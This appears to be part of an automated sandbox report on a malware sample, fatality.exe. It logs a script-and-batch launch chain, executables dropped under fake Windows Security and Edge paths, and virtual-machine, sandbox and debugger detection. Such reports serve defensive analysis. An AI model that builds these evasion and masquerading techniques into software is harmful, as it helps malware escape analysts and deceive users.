                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 1ABE0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMemory allocated: 1A7D0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMemory allocated: 1610000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMemory allocated: 1B3B0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 14B0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 1130000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 1AE60000 memory reserve | memory write watch
                                    Source: C:\ProgramData\dbg\containerReview.exeMemory allocated: F80000 memory reserve | memory write watch
                                    Source: C:\ProgramData\dbg\containerReview.exeMemory allocated: 1AB70000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeMemory allocated: 1730000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeMemory allocated: 1CF0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMemory allocated: 15C0000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMemory allocated: 1B000000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 1600000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: 1B370000 memory reserve | memory write watch
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\dbg\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeWindow / User API: threadDelayed 621Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\jPEOVQoM.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\VquIdqjl.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\nCWNxMEA.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\RLUzQxgL.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\PRRjZxCV.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\GgZbKUMi.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\RUDRugHQ.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\LTranRbW.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\HTJtRROP.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\ucFnGTXv.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeDropped PE file which has not been started: C:\Users\user\Desktop\eTDxNkzS.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\yCQlabwB.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exe TID: 5400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 7352Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 5032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 1600Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\containerReview.exe TID: 7232Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\containerReview.exe TID: 7248Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\dbg\containerReview.exe TID: 7392Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe TID: 7560Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockcomSession\containerReview.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\dbg\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DEA69B FindFirstFileW,FindFirstFileW,0_2_00DEA69B
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256861 NtQueryInformationProcess,GetSystemInfo,0_2_05256861
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\dbg\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                                    Source: wscript.exe, 00000002.00000003.2152465564.0000000003366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: fatality.exe, fatality.exe, 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                                    Source: fatality.exe, 00000000.00000003.2048896610.0000000003436000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\d
                                    Source: fatality.exe, fatality.exe, 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2301749702.000000001B0A0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000024.00000002.2272127454.0000028265E07000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002B.00000002.2340738507.0000016EAD127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\fatality.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Hides threads from debuggers
                                    Source: C:\Users\user\Desktop\fatality.exeThread information set: HideFromDebuggerJump to behavior
                                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                                    Source: C:\Users\user\Desktop\fatality.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\Desktop\fatality.exeFile opened: SIWDEBUG
                                    Source: C:\Users\user\Desktop\fatality.exeFile opened: NTICE
                                    Source: C:\Users\user\Desktop\fatality.exeFile opened: SICE
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E07DEE mov eax, dword ptr fs:[00000030h]0_2_00E07DEE
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256069 mov eax, dword ptr fs:[00000030h]0_2_05256069
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256393 mov eax, dword ptr fs:[00000030h]0_2_05256393
                                    Source: C:\blockcomSession\containerReview.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\containerReview.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\containerReview.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DFB7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,0_2_00DFB7E0
                                    Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"Jump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\containerReview.exe "C:\Users\All Users\dbg\containerReview.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\blockcomSession\mQBLhXIPAJ.exe "C:\blockcomSession\mQBLhXIPAJ.exe"
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DFF654 cpuid 0_2_00DFF654
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\blockcomSession\mQBLhXIPAJ.exe VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\blockcomSession\mQBLhXIPAJ.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                    Source: C:\ProgramData\dbg\containerReview.exeQueries volume information: C:\ProgramData\dbg\containerReview.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe VolumeInformation
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\blockcomSession\mQBLhXIPAJ.exe VolumeInformation
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
